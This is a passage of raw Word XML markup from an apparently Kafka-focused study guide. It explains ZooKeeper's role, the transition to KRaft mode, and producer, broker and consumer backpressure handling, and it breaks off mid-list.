          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300CDD1E" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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ZooKeeper tracks consumer group offsets and ensures that consumer groups have a consistent view of the partitions they are consuming from. It ensures that no message is missed or consumed more than once by the consumers in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B8DA7" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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figuration Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC643FE" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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uses ZooKeeper to manage configuration settings, such as replication factors, partition assignments, and topic configurations. It provides a way to update configurations dynamically and have them applied to the entire cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B38B8" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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Current Move Towards KRaft Mode (Kafka Raft Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2BD5B0" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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As part of Kafka's evolution, </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka 2.8.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduced a major change: the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KRaft mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Kafka Raft), which removes the dependency on ZooKeeper. The goal is to simplify Kafka's architecture and make it more efficient by having Kafka brokers manage their own metadata and coordination through a quorum-based consensus mechanism based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Raft protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B1C209" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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Here are the details of the transition from ZooKeeper to KRaft mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286DD246" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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1. Raft Consensus Protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18289CC7" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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In </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KRaft mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Kafka brokers take on the responsibility of managing metadata, including leader election and partition management, without the need for ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69132D7F" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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e Raft protocol, which is a consensus algorithm designed for managing replicated logs, replaces ZooKeeper's role in maintaining consistency across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC54B9D" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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2. Metadata Management within Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF27DC7" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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brokers will store and manage cluster metadata themselves, which means that ZooKeeper is no longer needed to store information about topics, partitions, and configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D040E3" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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e Kafka cluster metadata will be maintained in a distributed log, ensuring that brokers can reach consensus on changes to metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B563F93" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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3. Leader Election in KRaft Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1AE96" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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nstead of using ZooKeeper for leader election for partitions, Kafka brokers in KRaft mode elect leaders using the Raft consensus mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65239592" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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is allows for more streamlined operations and reduces the complexity of having a separate ZooKeeper ensemble for leader election.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DDD3B" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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4. Simplified Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778CD614" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Removing ZooKeeper reduces the operational complexity of managing a Kafka cluster. Kafka can now operate independently, without the need to manage and maintain a separate ZooKeeper ensemble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FDBF90" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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lastRenderedPageBreak/>
        <w:t>This change makes Kafka more self-contained and easier to deploy, manage, and scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAF2B8" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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5. Improved Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262E5CFB" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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n KRaft mode, Kafka brokers use the Raft protocol to achieve high availability and fault tolerance without ZooKeeper. If a broker fails, the Raft protocol ensures that other brokers can recover quickly by electing new leaders and replicating missing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1BE62" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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6. Transition and Compatibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE18E17" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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is still in the process of moving fully to KRaft mode. While the KRaft mode feature has been introduced in Kafka 2.8.0, it is still considered experimental. The full transition will take time, as it involves changes in how metadata is managed, partition leadership is elected, and consumer group offsets are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0414F60E" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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clusters that rely on ZooKeeper are still fully supported, and migration to KRaft mode will be an optional upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33302791" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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ackward Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For the time being, Kafka supports both ZooKeeper-based and KRaft-based clusters, allowing users to choose whether they want to upgrade to KRaft mode or continue with their ZooKeeper-based setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596AAD28" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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ey Benefits of KRaft Mode (Kafka Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81BC4F" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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implified Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4822084D" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145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ith KRaft, Kafka eliminates the need for a separate ZooKeeper ensemble, simplifying setup, operation, and management. There's no need to handle the complexity of running and maintaining ZooKeeper, which has historically been one of the more challenging aspects of managing a Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA55780" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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etter Fault Tolerance and Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1AA80F" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145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brokers using Raft will manage metadata in a more resilient way. The Raft protocol ensures that all brokers in the cluster have consistent metadata without needing to rely on an external service like ZooKeeper. This should also improve Kafka's scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE2A21" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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ower Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793164C" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145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nternal management of metadata can potentially reduce the latency associated with coordinating actions like leader election, partition assignment, and replication, compared to the ZooKeeper-based coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB2113" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Unified Metadata Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0A9F8" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145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ith KRaft, Kafka brokers directly manage metadata, streamlining the metadata lifecycle. This eliminates the need for coordination between Kafka brokers and ZooKeeper, reducing the possibility of errors or inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294587A8" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B71F58C" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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ZooKeeper’s Role</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditionally, ZooKeeper managed important tasks in Kafka, including cluster metadata management, leader election, partitioning, and consumer group offsets. It has been a crucial part of ensuring Kafka’s scalability, fault tolerance, and consistency in distributed environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5DA92" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Transition to KRaft Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka is moving toward a ZooKeeper-less architecture using the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Raft consensus protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. KRaft mode will simplify Kafka's architecture by having Kafka brokers manage their metadata and partition leaders, removing the need for an external coordination service. While this is a significant improvement, it is still in the process of being fully developed and tested in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEDD4B" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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As Kafka continues to evolve, the transition to KRaft mode promises to make the system more efficient and easier to manage, but users will need to evaluate their current infrastructure before migrating from ZooKeeper-based clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00996CAF" w14:textId="1D61DC00"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775E3C3">
          <v:rect id="_x0000_i3181" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB181E" w14:textId="390451FC" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00246E17" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="798" w:name="_Toc196308278"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Kafka handle backpressure</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="798"/>
    </w:p>
    <w:p w14:paraId="23092F8E" w14:textId="02244101" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="009D0BCE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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handles backpressure in a distributed streaming system by implementing several mechanisms that allow it to deal with message flow, consumer lag, and various performance bottlenecks. Here’s how Kafka handles backpressure in its architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32720D63" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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1. Producer-side Backpressure Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C786EA6" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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producers are the components responsible for sending messages to Kafka brokers. Backpressure in the producer side typically occurs when a producer is unable to send messages to Kafka at the rate it is producing them. Kafka has mechanisms to handle this situation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339AE6C" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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uffering and batching</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka producers accumulate messages into batches to send them to brokers. If the producer’s buffer becomes full due to high production rates, Kafka's producer API provides configurable </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>settings like linger.ms and batch.size to control how long messages are buffered before being sent and how much data is collected before sending a batch. If the buffer is full, producers can experience backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E53017" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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locking or retries</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the producer's buffer is full, Kafka’s producer will block further writes or apply retries (configurable with retries and acks configurations). If the broker is under heavy load or temporarily unavailable, the producer can retry sending the messages, allowing temporary backpressure to be relieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4172A771" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Asynchronous delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka producers also support asynchronous message delivery. If there is backpressure, producers can handle the delivery in an async manner and allow the main process to continue executing while messages are sent in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668E5FA8" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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2. Broker-side Backpressure Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8A66A" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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brokers are responsible for receiving messages from producers, storing them in topics, and serving consumers. On the broker side, backpressure can occur when brokers are unable to process messages at the rate they are being produced or when disk I/O is overloaded. Kafka handles backpressure in the following ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415306A" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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artition Replication and Replication Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka uses a replication mechanism to maintain multiple copies of data across different brokers. If one broker becomes slow or unavailable, other brokers can take over the replication, preventing system-wide delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEF0861" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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isk Capacity and Log Segments</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers have log segments where messages are stored. As messages are written to these log segments, Kafka uses disk I/O efficiently to manage and compress data. When disk utilization approaches its limits, Kafka may throttle incoming traffic or delay replication until resources are available. This ensures that brokers do not become overwhelmed by excessive incoming data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C216214" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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og Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka uses log compaction to discard old data that is no longer needed, which helps reduce disk usage and thus prevents brokers from being overwhelmed. This ensures brokers can focus on serving new messages without having to manage excess data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC883C" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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3. Consumer-side Backpressure Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C34017" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00542F33">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consumers are responsible for reading messages from Kafka topics. Backpressure in consumers occurs when they cannot consume messages fast enough, leading to increased lag. Kafka provides mechanisms to handle consumer-side backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7E611D" w14:textId="77777777" w:rsidR="00542F33" w:rsidRPr="0003272F" w:rsidRDefault="00542F33" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145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Lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
